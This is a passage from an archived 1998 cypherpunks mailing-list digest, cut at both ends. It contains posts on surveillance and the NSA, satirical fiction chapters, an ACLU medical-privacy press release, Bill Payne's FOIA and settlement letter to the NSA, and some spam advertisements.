Also, while his killings have been somewhat scary and weird,
they haven't generated the kind of public outrage that the
OKCity bombing did, with dead babies on the front page of the papers.
The defendents there are going to get killed, and the public
is going to enjoy it, and the Neilsen Ratings will be high.

>Next time, the killer might not be caught because
>the person who recognized (yea traffic analysis)
>his talktalk might not want them killed as a result.
>i.e. in the long run it will save lives.

I think you're right here.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Fri, 27 Feb 1998 14:31:59 -0800 (PST)
To: "'bill payne'" <billp@nmol.com>, ray kammer <" kammer"@nist.gov>
Subject: Cylink + NSA
Message-ID: <413AC08141DBD011A58000A0C924A6D50D7DAC@MVS2>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone notice that Cylink just got a new VP of product development?
Did anyone notice that this person just retired from the NSA?

Care to guess the name and former rank?

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Towey <pbx@shell.monmouth.com>
Date: Fri, 27 Feb 1998 11:25:43 -0800 (PST)
To: honig@otc.net
Subject: Re: FBI national wiretap stalled for $$
Message-ID: <199802271925.OAA18807@shell.monmouth.com>
MIME-Version: 1.0
Content-Type: text/plain



[B[B





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Fri, 27 Feb 1998 13:48:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 5/0
Message-ID: <009C2717.6A6E31C0.72@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Fri, 27 Feb 1998 13:49:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 5a/0
Message-ID: <009C2717.82F09BC0.78@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Fri, 27 Feb 1998 13:50:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 5c/0
Message-ID: <009C2717.9EA050E0.80@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Fri, 27 Feb 1998 13:54:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 3/0
Message-ID: <009C2718.4A375160.13@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


~       SPACE ALIENS HIDE MY DRUGS / PROLOGUE 3/0
	(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)(c)

The Most Dangerous Man In Lost Wagess:
  They had followed him from the CypherPunks physical meeting 
to the outskirts of Las Vegas, before losing him. Two days of
frantic searching by a variety of law enforcement agencies 
led to the Plaza Hotel and Casino, where he was playing the
penny slot machine and associating with a variety of local
riff(c)raff and no(c)accounts.
  An in(c)depth consultation with the Plaza head of security
revealed that they had been keeping a close eye on the
subject for the last two days.
  
  "He doesn't cause any real trouble, or anything," the
head honcho said, shrugging, "but everything about him
seems just a little strange, if you know what I mean."
  This comment seemed designed to elicit some sort of
response from the poker(c)faced men questioning him, but
they failed to respond, merely waiting for him to 
continue.
  "He buys ten dollars worth of pennies," and tips
the change lady a dollar. "He plays for hours on
end, also tipping the waitresses a dollar every
time they bring him a free beer. Hell, he even tips
the cleaning people when they clean his ashtray."
  The honcho shook his head, as if this type of
behavior from someone spending most of their time
playing the penny slots was puzzling and also
disconcerting.
  "Sleeps in his car, with his dog. Only leaves the
slot machines to feed, water, and run his dog around
our parking lot. It's kind of unnatural, the way he
seems to dote on that animal." the security honcho
winked knowingly.

  "Has he met with anyone who doesn't usually 
frequent your casino?" one of the men asked,
impatiently, tired of hearing odd details of the
man's lifestyle which seemed intriguing to the
denziens of normality that they were constantly
having to interview in regard to the subject's
movement and activity.

  "He ran into some legal(c)eagle named Larry Joe,"
the honcho said, noting the first sign of interest
shown by his interrogators. "My second(c)shift security
chief says he's a middle(c)weight poker player, taking
part in a tournament at the Rio..." adding with a
knowing tone, "but the mouthpiece is hanging with
one of the heavy hitters on the local poker scene."

  "Larry Joe Dowling, an Austin attorney." one of
the interrogators said to the others. "He usuallyj
We'd better shift our surveillance team into
high gear."
  The man rose to leave, telling the others, "Dig
up all you can here, file a report, and get some
sleep. You're going to need it."


Boogers? We don't need no stinking boogers!:
  The agent pulled out his hanky and wiped the disgusting
mess off of his jacket sleeve.
  "I can't believe that they pulled us off of the
Tim May detail to check out this fucking loser."
  "Shit!" he screamed, as he brushed his arm against
the steering column and picked up another piece of
disgusting slime on his jacket sleeve.

  "I've shaken down this guy's personals before." the
man's partner said, with a grin. "That's why I gave
you the driver's side of the vehicle to check out."
  "He feeds his nose(c)candy to his dog, and he always
leaves her a little desert on the steering wheel
for her to chow down on after he brings her back
from her walk." He laughed as he saw the bile
rising to his new partner's throat.
  He couldn't help himself(c)(c)he reached over and
plucked a booker off of the horn button and told
his partner, "I'll trade you a green one for a
yellow one..."
  His partner lurched out of the vehicle and
concentrated on tossing his lunch while not messing
up his shiny new shoes.

  The more experienced agent finished snapping photos
of the gathered items and then replaced them carefully
in the same position they had been in before their
intrusion.
  "He usually walks Baby for about ten minutes, to 
give us time to make a complete pass of his vehicle,
so our time is about up." The agent closed and 
locked the doors of the vehicle, motioning his
green(c)faced partner toward their vehicle.


It's A Nuke! No, It's Anthrax! No, It's...AAARRGGGHHHH!!!":
  Justin Case, Special Agent in Charge of the current
investigation, was bothered by the fact that the suspect
had seemed to be doing nothing more than wandering around
various sites and casinos in Las Vegas, with no apparent
pattern or plan to his movement and actions. Until he
read the report of the suspect's lingering interest in
the placement of the columns serving as the foundation 
for the Stratosphere Casino, and the layout of the
preliminary work on the new Foley Federal Buildingj

  "Soft targets." agent Case said out loud, causing
a considerable amount of disconcertment to his fellow
agent, Bobby Siller.
  "Damn!" Siller swore, "We have reports of him having
met with Leavitt and Harris, but we didn't have any
taps on them, so we don't have any details of what
they are planning."

  "Don't worry about it," Case seemed unconcerned, "if
he's scouting soft targets, then he's not planning any
sudden moves."
  "Patience comes to those who wait." Justin Case said,
softly, quoting the Author, and making a mental note to
have agent Siller shake the Anthrax Twins down a few
days after the suspect departed Vegas.

  "Hold it!" agent Siller shouted, motioning for his
superior to remain silent, as Siller adjusted his
earpiece to more clearly hear the live report he was
receiving from his agents at the Riviera gun show.
  "The suspect went into the gun show empty handed,
and left with several copies of 'Gun List' and then
returned to his vehicle. He took his dog for a walk
and our agents discovered a 'Dalian' watch wrapped
in tear(c)outs from the firearms paper, dealing with
Romanian AK rifles and Bulgarian SLR(c)95's. The 
'Dalian' watch is some type of Polish/Chinese make,
or something."

  Justin Case rolled his eyes, but remained silent.
The suspect was yanking the chains of the agents who
were shaking down his personals, and it looked like
Siller's men didn't have the experience to know when
they were being toyed with.
  The agent that Case had pulled off of the Tim May
detail would be wise to the suspect's shenanigans,
but it was unlikely he would get in the way of
Siller's men making fools of themselves.

  "He's returning to the casino, using the copies
of 'Gun List' to hide whatever it is he's carrying."
agent Siller said, with great excitement.
  "I think we ought to take him in the parking 
garage, before he reaches the main building at the
Riviera." Siller anxiously awaited the word from
his superior.
  "Maintain." was Case's nonchalant reply, causing
Siller to have an ill(c)disguised internal shit(c)fit.
If this operation went totally to hell, it would
be Siller's ass on the line, being the Las Vegas
station chief.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Fri, 27 Feb 1998 13:55:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 3a/0
Message-ID: <009C2718.5FE98460.15@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


SAHMD 3A
(c)(c)(c)(c)(c)(c)(c)(c)
  "Maintain," Siller told his agents, but couldn't help 
adding, "and disclose."
  This was a vague term meant to signal his men to 
intercept the suspect and do a bump(c)and(c)run on him
to sniff out what it was he was hiding(c)(c)without alerting
Siller's superior that his orders were being countermanded.

  "The Electronic Privacy Papers." agent Case said, to no
one in particular.
  "What?" Siller asked, perplexed.
  "Documents on the Battle for Privacy in the Age of
Surveillance, by Bruce Schneier and David Banisar,
ISBN: 0(c)471(c)12297(c)1."
  Much to agent Siller's consternation, his superior
continued, "That's what your men are going to discover
he is hiding furtively under those copies of the 'Gun
List' magazines when they disobey my orders and risk
blowing their cover."

  "It's the suspect's form of humor." Justin Case
smiled at his subordinate's discomfort.
  "He's laughing at all the spooks from various
agencies, including yours and mine, who are at the
gun show shadowing the Anthrax Twins, the Samsonite
Nuclear Warrior, and various members of the Loose(c)Screw
Gun Nut Club."
  Seeing the confused look on agent Siller's face, he
explained further. "The suspect is laughing because
he believes he is carrying the most dangerous weapon
available at the gun show."

  "And he's probably right..." Case said, with a far(c)
away look in his eyes that sent shivers down agent
Siller's spine.
  Special agent Justin Case took a tattered copy of
a paperback titled, "Paper Prison" out of his inside
jacket pocket, and stared at it(c)(c)lost in a universe
that belonged far in the past, but which seemed to
be intersecting the present in a manner which bode
nothing but ill for those who continued to live in
both.

  "The future is now..." Justin Case said, in a low
monotone voice that seemed to come from a world beyond
the one in which he and agent Siller were so diligently
pursuing the 'Threat of the Day'.

  "He's carrying a book." the voice came crackling
through Siller's earpiece.
  "Never mind." Siller said, adding, "Maintain."

  "Maintain." Siller repeated inwardly, to himself,j
crept up his spine and into the lower regions of
his mind as he observed the strange, semi(c)hypnotic
state that his superior had entered into.
  "Maintain."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JWRCLUM <JWRCLUM@aol.com>
Date: Fri, 27 Feb 1998 14:10:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Medical Privacy Alert  ---  please redistribute to all concerned
Message-ID: <476eb078.34f7399b@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


AMERICAN CIVIL LIBERTIES UNION OF MASSACHUSETTS
99 Chauncy Street, Suite 310, Boston, MA 02111
(617) 482-3170  Fax (617) 451-000


CONTACT:	John Roberts
(617) 482-3170     http://users.aol.com/mcluf/home.html

BENNETT-JEFFORDS BILL PLACES MEDICAL RECORD PRIVACY AT RISK

	The confidentiality of the doctor-patient relationship will be totally
undermined as medical records become widely available without patient
knowledge or consent.	

	BOSTON - February 27, 1998.   On Thursday 2/26/98 the United State Senate's
Labor and Human Resources Committee heard testimony concerning a bill proposed
by Senators Bennett and Jeffords that, if passed, would license the widespread
disclosure of personal medical information contained in files held by doctors,
hospitals, employers, educational institutions, and others.
	The bill which purports to be a privacy bill is, in fact, just the opposite.
It places virtually no restrictions on the disclosure of personal medical
records within health care entities (no matter how large and geographically
widespread) or to a long list of other entities and agencies including the
following:  
	-  any agents or contractors of the health care entities 
	-  Public Health Agencies, Oversight Agencies
	-  Health Care Accreditation Agencies
	-  State Health Care Databases
There are major loopholes in access provisions for
	-  Health Care Researchers
	-  "Outcome" analysts ("cost/benefit" analysts for hospitals, HMO's,
insurers, etc)
	
	Even law enforcement agencies will have easy access to browse computerized
medical record systems for so-called "legitimate" investigatory purposes.
This will make every American's medical record part of a new massive law
enforcement database.
	The bill will destroy the confidential "doctor-patient relationship" and
replace it with a new "patient-health care industry relationship."
	"This bill serves only the interests of the burgeoning health care industry,"
said John Roberts, Executive Director of the ACLU of Massachusetts.  "It
allows the transfer of your medical records to many entities that stand to
profit from its information.  Gone is doctor-patient confidentiality.  Your
doctor cannot protect your most sensitive medical information from many
entities outside your medical facility.  Even employers who have health plans
are considered 'health care providers' in the Bennett-Jeffords bill.  How many
of us want our employers to have access to any of our medical records without
our knowledge or consent?"  
	The bill will also
	-  Impose requirements that patients sign blanket consent forms for release
of information as a condition of getting treatment, even for self-pay patients
	- Redefine "treatment" to make the patient's record a subject of continuous
research
	- Blur the boundaries between individual patient care and the so-called
"Population Management" and "Disease System Management"
	The bill will pre-empt all state laws which may be more protective of the
confidentiality of medical records.
	The bill will not apply even its own minimal privacy protections to so-called
"non-identifiable" medical records information.  But...interestingly, the bill
also refers to issuing "keys" to re-identify previously purportedly "non-
identified" information.  A formal logical analysis of this reveals that the
bill itself admits that what it calls "nonidentifiable" medical record
information is actually identifiable (i.e. containing patient information).
	The ACLU of Massachusetts believes that what is really needed for medical
privacy protection would be the following:
	-  Federal law should set a foundation or floor of privacy protection
	-  State laws which are more-protective of patient's rights should not be
preempted 
	-  No "Unique Patient Identification Numbers"
	-  No electronic "linkage" of patient records stored in various sites
	-  Computerized patient records must be encrypted with keys provided only to
those directly involved in the individual patient care
	-  The right of the individual patient to contract directly with physicians
and health care providers regarding the privacy of the patient's medical
records.

	-end-




 

 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 27 Feb 1998 16:55:52 -0800 (PST)
To: merata@pearl.sums.ac.ir
Subject: With Respect to the Japanese
Message-ID: <34F75FD2.2084@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 2/27/98 5:27 PM

Merat

After Sandia unloaded on me for TRYING to be friendly with a 
Japanese [and perhaps other things too] , I enrolled in the UNM 
US-Japan program.

One of the professors in the program is Jack Condon.

   name: John Carl Condon
   work_phone: 505 277-5811
   title: Professor
   organization: Communication & Journalism
   org_address: C & J Building

Condon teaches both at the University of New Mexico and
a Japanese University.

Condon is a very nice touchy-feely-type person.

Condon wrote [amazon.com]
                          
                            With Respect to the Japanese
                            by John C. Condon
                            List: $12.95
                            Our Price: $12.95

                            Availability: This title is currently on
back order. We do
                            not have a reprint date for this title, but
we expect to be
                            able to ship it to you within 3-5 weeks.

                            Paperback
                            Published by Intercultural Press
                            Publication date: June 1983
                            ISBN: 0933662491

Condon told our class,

   The US does not do very well without an enemy.

So.  Let's do OUR BEST to insure that that US does
not do very well, at least with Iran.

And Merat, another of my former Ph D students in Computer
Science is

   name: John Sobolewski
   work_phone: 505 277-8125
        title: Assoc VP,Info Technology
  organization: CIRT - Administration
  org_address: 2701 Campus Blvd NE
  email: jssob@unm.edu

Let's all hope this mess gets settled.

Best
bill

Title: UNM Computer and Information Resources and Technology (CIRT)













Help!
How to get quick help: Answers to frequently asked questions, Help Desk, publications and documentation, 
who to contact, CIRT hours.

Services
What CIRT can do for you: Details about our services such as computing
facilities (pods), help desk, consulting, hardware maintenance, security,
software distribution, computer accounts, training, conference support and much more.

Qu Pasa?
What's happening at CIRT: Announcements, important systems news, scheduled system availability,
major projects we've undertaken, technical directions and job opportunities.

About CIRT
Who we are and how we are organized: Our mission and vision, a map
of the CIRT building, CIRT group organization, the annual report,
our system configurations and standards.










Send us your ideas on how CIRT can improve services to the UNM community!



Comments to CIRT Publications: docs@unm.edu

Last Revised: 10/28/97



The University of New Mexico
Albuquerque, New Mexico USA
Copyright (c) 1995 The University of New Mexico.




Title: Welcome to the Japan America Society of New Mexico










    
        <img src="http://www.us-japan.org/jasnm/crane.GIF"
        alt="Crane logo" width="127" height="138">
        <font
        color="#800080" size="5">JAPAN AMERICA SOCIETY OF
        NEW MEXICO
        
        <img
        src="http://www.us-japan.org/jasnm/crane.GIF" alt="Crane logo" width="127" height="138">
    







Ohayoo Gozaimasu! 

Greetings and welcome to the Web site of
the Japan America Society of New
Mexico. The Board of Directors
and the Membership extend to you our desire that you visit the
"Land of Enchantment" and sample the
"chili-hot" welcome and hospitality shown here. The
vistas are broad; the cuisine superb. In a multi-cultural
environment, we embrace all that is the state, and wait to enfold
you as well! Please enjoy. Yoroshiku, onegai shimasu!


    
        <img
        src="http://www.us-japan.org/jasnm/cvr-pg2.gif" align="top" width="579" height="653">
    





    
        <a href="http://www.us-japan.org/jasnm/bg&miss.htm"
        name="Buttons"><img src="http://www.us-japan.org/jasnm/s-lant4.gif"
        alt="single lantern image" align="middle" width="49"
        height="50">
        <font
        color="#800080" size="4">BACKGROUND AND MISSION
        
        <img
        src="http://www.us-japan.org/jasnm/s-lant4.gif" alt="single lantern image"
        align="middle" width="49" height="50">
        <font color="#800080"
        size="4">BOARD OF DIRECTORS AND OFFICERS
    
    
        <img
        src="http://www.us-japan.org/jasnm/s-lant4.gif" alt="single lantern image"
        align="middle" width="49" height="50">
        <font
        color="#800080" size="4">MEMBERSHIP
        <img
        src="http://www.us-japan.org/jasnm/s-lant4.gif" alt="single lantern image"
        align="middle" width="49" height="50">
        <font
        color="#800080" size="4">BENEFITS
    
    
        <img
        src="http://www.us-japan.org/jasnm/s-lant4.gif" alt="single lantern image"
        align="middle" width="49" height="50">
        <font
        color="#800080" size="4">FUNDING
        <img
        src="http://www.us-japan.org/jasnm/s-lant4.gif" alt="single lantern image"
        align="middle" width="49" height="50">
        <font
        color="#800080" size="4">CONTACT INFORMATION
    
    
        <img
        src="http://www.us-japan.org/jasnm/s-lant4.gif" alt="single lantern image"
        align="middle" width="49" height="50">
        <font
        color="#800080" size="4">FUTURE EVENTS
        <img
        src="http://www.us-japan.org/jasnm/s-lant4.gif" alt="single lantern image"
        align="middle" width="49" height="50">
        <font
        color="#800080" size="4">PAST EVENTS
    
    
         
         
         
         
    






Friday February 27, 1998 3:15 PM


By e-mail and US mail

Lieutenant General Kenneth A Minihan, USAF
Director, National Security Agency
National Security Agency
9800 Savage Road
Fort George G. Meade, MD 20755-6000

Dear General Minihan:

Purposes of the letter are to

1  request information under the Freedom of Information Act
2  explore settlement possibilities of our current lawsuit.

In about 1986 Sandia National Laboratories assigned me the 
task of  design and construction of a Comprehensive Test Ban 
Treaty seismic data authenticator.

In the initial stages of the project, Sandia cryptographer 
Gustavus Simmons attempted to convince both Sandia 
management and NSA employees Tom White, Mark Unkenholtz,
and Ed Georgio that a form of public key authentication should 
replace NSA employee Ronald Benincasa's National Seismic
Station/Unmaned Seismic Observatory 11-bit data authentication
algorithm.

My Sandia supervisor John Holovka and project leader H B [Jim]
Durham ordered me to write a paper explaining public key 
cryptography.

This paper,  RSA ENCRYPTION, along with my SAND report
describing my implementation of Benincasa's algorithm and
filings in our lawsuit, now appear on Internet at
http://www.jya.com/index.htm, click CRYPTOME, then OpEd,
then http://www.jya.com/whprsa.htm.

Sandia explored the merits of switching from Benincasa's
algorithm to a public key-based authentication method suggested
by Simmons.

For Sandia's evaluation of the merits of public key, electronic tagging,
and Bureau of Engraving and Printing projects ,  I bought for Sandia 
samples both the Cylink CY1024 and AT&T A & B two chip sets for
modulo m arithmetic computations.

NSA employee Tom White sent me a copy of the SECRET classified
NSA report on IBM's hardware public key chip FIREFLY.

I wrote in my tutorial paper

  RSA hardware computations

  The slow speed of software RSA computations plus the potential
  wide use prompted several companies to build chips which compute
  modular arithmetic to at least several hundred bits.  Most of
  these chips "cascade" to compute with a larger number of bits.

  Corporations involved in building these chips are

     1  IBM  Firefly

     2  AT&T

     3  Motorola (apparently a three chip set)

     4  Cylink   Pittway-First alert

     5  Sandia Labs (Algorithm M and predecessor chip)

  Details of the IBM chip is classified.  AT&T as of July 1987 has
  not released details of their chip.  Little information is
  available on the Motorola chip set.

  The Cylink chip is commercially available.  Its price dropped
  from $1,500 to $600 each in June 1987.  Data is transferred to
  and from the chip with serial shift register communication.

  The early Sandia chip was limited in speed.  The replacement
  chip is cascadeable, communicates with 8 or 16 bits parallel,
  matches the speed of the Cylink chip, but is not out of
  fabrication.

  Rumors circulate that there is about an order of magnitude
  performance difference between some of these chips.

  These hardware chips improve exponentiation speed about 3 orders
  of magnitude over software implementation benchmarked on an Intel
  8086 family microcomputer.

Whitfield Diffie writes about both the Cylink and Sandia chips.  And
is quoted at  http://www.aci.net/kalliste/nukearse.htm.

Sandia had terrible luck with its public key chips.  

I reported SOME of the troubles to Electronic Engineering Times editor 
Loring Wirbel [http://techweb.cmp.com/eet/823/] on March 23, 1994.

        Dr. John Wisniewski was a supervisor at Sandia's Center for
        Radiation-hardened Microelectronics.  Wisniewski was a graduate
        student at Washington State University in about 1975.  I was a
        professor at WSU.

        Wisniewski knows all about the failing Sandia chips in the nuclear
        arsenal.  I took notes on February 13, 1993.  Wisniewski reviewed
        the problems again for me.

             1    No quality initiative.  Each chip lot had a different
                  process.
             2    Overall yield - 40-50%.  Down to 10% after packaging.
             3    Metalization problems.  No planarization.  No flow of
                  glass.  Couldn't use high temperature.  Step coverage
                  problems.  Layed down over tension.  100% field returns
                  over several years.
             4    Sandia would store lots of parts for replacements.

        Sandia management made the decision to place low yield parts in
        the nuclear arsenal.  Sandia must meet DOD schedules management
        reasoned.  Hundreds of millions spent on CRM.  Sandia must show
        productivity.

        Wisniewski told me that low yield chip test survivors are those   
        whichthe tests failed to detect failures.  Wisniewski will talk.  
        503-625-6408.  Wisniewski now works for Intel in Oregon.  Have 
        Wisniewski tell you about the fire in the CRM clean room!

Sandia supervisor Jerry Allen later told me it cost $300,000 each to remove
Sandia's failing chips at Pantex from a nuclear bomb.

NSA apparently is biased toward hardware implementations of cryptographic
and authentication algorithms.  As opposed to software implementation.

NSA representatives and Sandia management decided not to use a public
key authentication scheme for its CTBT seismic data authenticator because
of all of the problems with implementing public key algorithms.

But NSA surely has spent MUCH MONEY on public key chip implementations.

NSA is promoting its Clipper crypto chips as described at 
http://cpsr.org/dox/clipper.html.

And we get some information about technical specifications of NSA's Clipper
chip at http://www.us.net/softwar/http://www.us.net/softwar/clip.html

  Clipper Chip Information

  MYK-78 CLIPPER CHIP ENCRYPTION/DECRYPTION  ON A CHIP 

     1 micron double level metal CMOS technology 
     0.35 watts power 
     28 pin plastic leaded chip carrier (PLCC) package 
     Transistor to transistor logic (TTL) interface 
     Chip ID, family key and device unique key are installed at 
     programming. 
     Chip ID, family key and device unique key are installed at programming           
     facility and are completely transparent to the user.

Therefore, Under the provision of the Freedom of Information Act, 
5 USC 552, I am requesting access to: 

1  Copies of all invoices from

	A   AT&T
	B   Motorola
	C   IBM
	D  Sandia National Laboratories

to NSA for payments for developing ANY public key-related chips between 
January 1, 1980 and February 27, 1998.

2  Copies of all invoices to NSA from ANY corporation involved in 
development
of ANY Clipper chip-related hardware between January 1, 1980 and 
February 27, 1998.

The public has a right to know how much NSA spent on TRYING monoploize the 
crypto business.

If there are any fees for searching for, or copying, the records I have 
requested, please inform me before you fill the request.

As you know, the Act permits you to reduce or waive the fees when the 
release of the information is considered as "primarily benefiting the 
public."
  
I believe that this requests fits that category and I therefore ask that 
you waive any fees.

If all or any part of this request is denied, please cite the specific 
exemption(s) which you think justifies your refusal to release the information and inform me of your agency's administrative appeal procedures available to me under the law.

I would appreciate your handling this request as quickly as possible, and I 
look forward to hearing from you within 20 working days, as the law stipulates.

With respect to our current FOIA lawsuit, I feel that we should settle this
unfortunate matter.

I see from your biography at  http://www.nsa.gov:8080/ and
http://www.nsa.gov:8080/dirnsa/dirnsa.html that you are

         1979   Distinguished Graduate
         Master of Arts degree in National Security Affairs 
         Naval Postgraduate School 
         Monterey, California

One of my former M.S. and Ph.D students in Computer Science,
Ted Lewis, is currently the chairman of Computer Science at
Naval Postgraduate School [http://www.friction-free-economy.com/].

Small world.

But I think that this emphasizes that WE SHOULD all be on the same side.
Not engaged in a conflict in US federal court.  Or on Internet.

NSA attempts to withhold requested information are possibly unwise.  

In our wired world the aggrieved know what happened to them.
[http://www.aci.net/kalliste/speccoll.htm]. http://www.wpiran.org/,
http://www.netlink.co.uk/users/impact/namir/namirm.html

And moderates in Iran, [http://persia.org/khatami/biography.html], appear 
want settlement too.

My family and I have been damaged by these crypto wars.

I ask you that consider fair settlement of damages caused by the National
Security Agency.

I cannot find your e-mail address on Internet.

Therefore I will forward the e-mail copy of this FOIA/settlement letter to 
Ray Kammer of NIST [http://www.nist.gov/], who along with the FBI 
[http://www.fbi.gov/, http://www.fbi.gov/fo/nyfo/nytwa.htmand], and NSA 
are trying to control the crypto business so that Kammer can possibly
forward an e-mail copy of the FOIA/Settlement letter to you.

Sincerely,

bill

William Payne
13015 Calle de Sandias
Albuquerque, NM 87111
505-292-7037 [I am not reading e-mail]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carol.a1@usa.net
Date: Fri, 27 Feb 1998 19:05:24 -0800 (PST)
To: carol.a1@usa.net
Subject: Attraction
Message-ID: <0000000000.AAA000@usa.net>
MIME-Version: 1.0
Content-Type: text/plain


Do you want to succeed at dating, or you just need a little spark to your
relationship or marriage?

Well here is the Answer for you!

Sensations., the new Compact Disc that  uses proven subliminal techniques to
increase your chances of SEXUAL success with the opposite sex.. Simply play it
and watch it work!!!!

do you want to be a winner?   

If yes then go to http://207.134.166.10/users/subliminal/subliminal.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 28 Feb 1998 00:28:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: FC: Quotes of the Day (and cybercrime)
In-Reply-To: <Pine.GSO.3.95.980227184346.3216O-100000@well.com>
Message-ID: <3.0.5.32.19980228002208.008eb7d0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


James Glave's Wired News article at
	http://www.wired.com/news/news/technology/story/10605.html
is nice, especially the quote from Peter Neumann about how this
may be a con game by Janet Reno to get more budget.  After all,
the Feds has been doing computer security for a while, though
not with the expertise of the NSA.  So if they're so hot,
why do they keep getting cracked so badly, and on such critical stuff
as payroll data, which in the government is almost certain to include SSNs?
There's already a National Computer Security Center - she could
ask them for help, rather than starting a competing one.

>LIVERMORE, Calif. (AP) - To combat the threat of cyber attack, Attorney
>General Janet Reno said Friday a new high-tech crime center will be
>created under the jurisdiction of the FBI.
...
>	Reno played down the Big Brother aspects of an Internet police
>force.
>	"We must not and we will not sacrifice any constitutional
>protections," the attorney general said.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awsales@www.a-world.com
Date: Fri, 27 Feb 1998 22:35:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Your #1 place for computer hardware and software deals!
Message-ID: <199802280636.BAA26562@out.a-world.com>
MIME-Version: 1.0
Content-Type: text/plain



Would you like some CableTV with your PC?!
->Cable TV for Your Computer                                 from $1.00

Maybe some tunes?
->FM Radio Tuner Card for your PC                         from $1.00

Check these deals out!
DVDs/Opticals:
 TOSHIBA DVD-ROM DRIVE                                 from $41.00
 Rewritable Optical Drive(6X IDE)                           from $51.00

Monitors:
 Dell Multisync 20'' Sony Trinitron Monitor                 from $451.00
 AmpView 14'' .28mm NI SVGA Color Monitor          from $41.00
 AmpView 15'' .28mm NI SVGA Color Monitor          from $91.00
 AmpView 17'' .28mm NI SVGA Color Monitor          from $151.00

Hard Drives:
 Fujitsu 9.1GB Fast SCSI-2 HDD                              from $201.00
 Hawk 4 Seagate 4.3Gig SCSI-2                              from $141.00

CD-ROMs:
 4 Disk CD Changer(8X IDE)                                    from $41.00
 Sanyo CD-ROM Drive(8X IDE)                                from $21.00
 Hitachi 7730 (4X IDE)                                              from $11.00

Multimedia:
 3D Hardware Wavetable with Amplified Spkrs       from $21.00
 Multimedia Stereo Keyboard                                  from $6.00
 Logitech WingMan Warrior Joystick                      from $6.00
 Logitech WingMan Extreme Digital Joystick          from $6.00
 Duplex 3D Wavetable Sound Card                        from $6.00

Software:
 MS Office Pro 97 Full Version!!                              from $56.00
 MS Windows95(USb)                                             from $41.00

Scanners:
 30-bit Color Flatbed Scanner                                 from $11.00
 PageScan Color Professional Scanner                  from $21.00
 LOGITECH PageScan Color Scanner                   from $11.00

Miscellaneous:
 56Kbps Internal Fax/Data Modem(X2 compatible) from $41.00
 SCSI CD-ROM Case                                                from $6.00
 Mini-Tower Case(250 Watt)                                     from $11.00
 Pentium Pro ATX motherboard                                from $21.00
 75MHz to 233MHz Pentium/MMX PnP Mboard     from $31.00
 3D 4mb 128-bit PCI Video Card                              from $61.00







-For a world of opportunity, come to-
 --> http://www.AuctionWorld.net <--



Auction World, Inc. (c)1998




If you would like to be removed from our special promotional list,
please reply to this email with only the word 'unsubscribe' as the subject heading.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ekkoh1 <Ekkoh1@aol.com>
Date: Thu, 5 Mar 1998 08:12:34 -0800 (PST)
Subject: WARNING!
Message-ID: <3557c8ad.34f8053e@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Warning! You're about to see something great!  If you are interested, visit
this web site....

http://207.36.85.71




or click here!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 28 Feb 1998 05:14:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Radio Frequency Warfare Hearing
Message-ID: <1.5.4.32.19980228131755.00718780@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We offer the lengthy prepared testimony at the Joint 
Economic Committee hearing February 25 on "Radio Frequency 
Weapons and Proliferation: Potential Impact on the Economy."

  http://jya.com/rfw-jec.htm  (112K)

Or zipped:

  http://jya.com/rfw-jec.zip (39K)

It provides descriptions of the RF weapons, their 
development, research and testing, global spread, and 
threat to the infrastructure and national security.

The Internet availability of Carlo Kopp's paper on the 
